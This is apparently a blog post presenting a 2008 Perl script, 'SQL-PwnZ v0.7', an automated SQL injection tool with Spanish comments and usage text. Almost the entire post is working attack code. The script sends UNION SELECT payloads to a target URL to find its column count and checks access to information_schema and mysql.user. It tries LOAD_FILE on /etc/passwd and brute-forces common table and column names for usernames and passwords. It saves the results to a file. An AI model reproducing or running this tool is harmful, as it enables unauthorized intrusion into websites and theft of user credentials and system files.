Script:
#!/usr/bin/perl
###########################################################################################
# -[+]- SQL-PwnZ v0.7 | By Login-Root -[+]- ###
###########################################################################################
###########################################################################################
# [+] inf0: ###
###########################################################################################
# Busca: ###
# ====== ###
# - Nº de columnas ###
# - Information_Schema && MySQL.User ###
# - LOAD_FILE ###
# - Tablas ###
# - Columnas ###
# ###
# ...y guarda todo en un archivo de texto. ###
# ###
###########################################################################################
###########################################################################################
# [+] c0ntact: ###
###########################################################################################
# MSN: no.more@passport.com ###
# Jabber: login-root@x23.eu ###
# E-Mail: login_root@yahoo.com.ar ###
###########################################################################################
###########################################################################################
# [+] sh0utz: ###
###########################################################################################
# In memory of ka0x | Greetz: KSHA ; Psiconet ; Knet ; VenoM ###
# Many thanks to boER, who teach me a little of perl ;D ###
# VISIT: WWW.MITM.CL | WWW.REMOTEEXECUTION.ORG ###
###########################################################################################
use LWP::Simple;
if(!$ARGV[2])
{
print "\n\n-[+]- SQL-PwnZ v0.7 | By Login-Root -[+]-\n=========================================";
print "\n\nUso: perl $0 [WEBSITE] [COLUMNS] [FILE] [-T] [-C]\n";
print "\n[WEBSITE]: http://www.web.com/index.php?id=\n[COLUMNS]: Limite de columnas\n[FILE]: Archivo donde guardar web vulnerable\n[-T]: Intentar brutear tablas (Opcional)\n[-C]: Intentar brutear columnas (Opcional)\n\n";
exit (1);
}
@nombretabla=('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
'name','names','nombre','nombres','usuarios','member','members','admin_table',
'miembro','miembros','membername','admins','administrator',
'administrators','passwd','password','passwords','pass','Pass',
'user_password','user_passwords','user_name','user_names',
'member_password','mods','mod','moderators','moderator','user_email',
'user_emails','user_mail','user_mails','mail','emails','email','address',
'e-mail','emailaddress','correo','correos','phpbb_users','log','logins',
'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
'u_password','nick','nicks','manager','managers','administrador',
'administradores','clave','login_id','pwd','pas','sistema_id',
'sistema_usuario','sistema_password','contrasena','auth','key','senha',
'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','tb_users','tb_user','tb_sys','sys',
'fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors',
'accounts','account','accnts','accnt','customers','customer','membres','administrateur','utilisateur','utilisateurs',
'password','passwords','amministratore','god','God','authors','autores','membername','usuario','Users','Admin','Members',
'Miemberos','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
@nombrecolumna=('admin_name','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','user_name','username','name',
'user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','usrnm','user_usrnm','usr',
'usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','sistema_usuario','auth',
'key','membername','nme','unme','psw','password','user_password','pass_hash','hash','pass','userpass','user_pass','upw',
'pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','user_pwd','u_pass','clave',
'contrasena','pas','sistema_password','auth','key','upassword');
open(WEB,">>".$ARGV[2]) || die "\n\n[-] Imposible crear el archivo de texto\n";
$column = 0;
print "\n[!] Chequeando si la web es vulnerable...\n";
$sql=$ARGV[0]."-1+union+all+select--";
$response=get($sql)or die("[-] Direccion web ingresada erroneamente, favor de reingresar de nuevo\n");
if($response=~ /mysql_fetch_/ || $response=~ /You have an error in your SQL syntax/)
{
print "[+] Web vulnerable, continua el script...\n";
print WEB "[WEBSITE]:\n\n$ARGV[0]\n";
}
else
{
print "[-] Website no vulnerable a SQL Inyection\n\n";
exit(1);
}
print "\n[!] Buscando columnas...\n";
while ($column < $ARGV[1])
{
$union.=','.$column;
$inyection.=','."0x6c6f67696e70776e7a";
if ($column == 0)
{
print WEB "\n[COLUMNAS]:\n\n";
$inyection = '';
$union = '';
}
$sql=$ARGV[0]."-1+union+all+select+0x6c6f67696e70776e7a".$inyection."--";
$response=get($sql)or die("[-] Error al intentar encontrar el numero de columnas, chequear website\n");
if($response=~ /loginpwnz/)
{
$column ++;
print "[+] La web posee $column columnas\n\n";
$sql=$ARGV[0]."-1+union+all+select+0".$union."--";
print "$sql\n";
print WEB "$sql\n";
print "\n[!] Chequeando si existe Information_Schema...";
$sql=$ARGV[0]."-1+union+all+select+0x6c6f67696e70776e7a".$inyection."+from+information_schema.tables--";
$response=get($sql)or die("[-] Imposible obtener Information_Schema\n");
if($response=~ /loginpwnz/)
{
print "\n[+] Information_Schema disponible...guardando en $ARGV[2]";
$sql=$ARGV[0]."-1+union+all+select+0".$union."+from+information_schema.tables--";
print WEB "\n\n[INFORMATION_SCHEMA]:\n\n$sql\n";
}
else
{
print "\n[-] Information_Schema no disponible";
}
print "\n[!] Chequeando si existe MySQL.User...";
$sql=$ARGV[0]."-1+union+all+select+0x6c6f67696e70776e7a".$inyection."+from+mysql.user--";
$response=get($sql)or die("[-] Imposible obtener MySQL.User\n");
if($response=~ /loginpwnz/)
{
print "\n[+] MySQL.User disponible...guardando en $ARGV[2]";
$sql=$ARGV[0]."-1+union+all+select+0".$union."+from+mysql.user--";
print WEB "\n\n[MYSQL.USER]:\n\n$sql\n";
}
else
{
print "\n[-] MySQL.User no disponible";
}
print "\n[!] Chequeando si es posible inyectar LOAD_FILE...";
$sql=$ARGV[0]."-1+union+all+select+load_file(0x2f6574632f706173737764)".$inyection."--";
$response=get($sql)or die("[-] Imposible inyectar LOAD_FILE\n");
if($response =~ /loginpwnz/ || $response !~ /mysql_fetch_/ && $response !~ /Access denied for user/ && $response !~ /doesn't exist/)
{
print "\n[+] LOAD_FILE disponible...guardando en $ARGV[2]";
print WEB "\n\n[LOAD_FILE]:\n\nload_file(0x2f6574632f706173737764) => OK!\n";
}
else
{
print "\n[-] LOAD_FILE no disponible";
}
if ($ARGV[3] =~ /-T/ || $ARGV[3] =~ /-t/)
{
print "\n\n[!] Bruteando tablas...";
print WEB "\n\n[TABLAS]:\n\n";
foreach $tabla(@nombretabla)
{
chomp($tabla);
$sql=$ARGV[0]."-1+union+all+select+0x6c6f67696e70776e7a".$inyection."+from+".$tabla."--";
$response=get($sql)or die("[-] Imposible obtener tablas\n");
if($response =~ /loginpwnz/)
{
print "\n[+] La tabla $tabla esta disponible...guardando en $ARGV[2]";
$sql=$ARGV[0]."-1+union+all+select+0".$union."+from+".$tabla."--";
print WEB "$sql\n";
}
}
}
if ($ARGV[3] =~ /-C/ || $ARGV[3] =~ /-c/ || $ARGV[4] =~ /-C/ || $ARGV[4] =~ /-c/)
{
print "\n\n[!] Tabla a la cual brutear columnas: ";
$tabla.=;
chomp($tabla);
print WEB "\n\n[COLUMNAS EN TABLA]: $tabla\n\n";
foreach $columna(@nombrecolumna)
{
chomp($columna);
$sql=$ARGV[0]."-1+union+all+select+".$columna.$inyection."+from+".$tabla."--";
$response=get($sql)or die("[-] Imposible obtener columnas\n");
if($response =~ /loginpwnz/ || $response !~ /mysql_fetch_/ && $response !~ /Access denied for user/ && $response !~ /doesn't exist/)
{
print "\n[+] La columna $columna esta disponible...guardando en $ARGV[2]";
print WEB "$columna\n";
}
}
}
print WEB "\n\n\n[*EOF*]";
print "\n\n[+] Todo salvado correctamente en $ARGV[2]\n";
print "## c0ded by Login-Root | 2008 ##\n\n";
exit (1);
}
else
{
$column ++;
}
}
print "\n[-] Imposible encontrar numero de columnas, intentar con mas columnas\n";
exit (1);
Ejemplo de uso:
http://img134.imageshack.us/img134/6568/07perlzc5.png
Archivo de texto de salida:
http://img182.imageshack.us/img182/4941/07textls7.png
By Login-Root
0 comentarios:
Publicar un comentario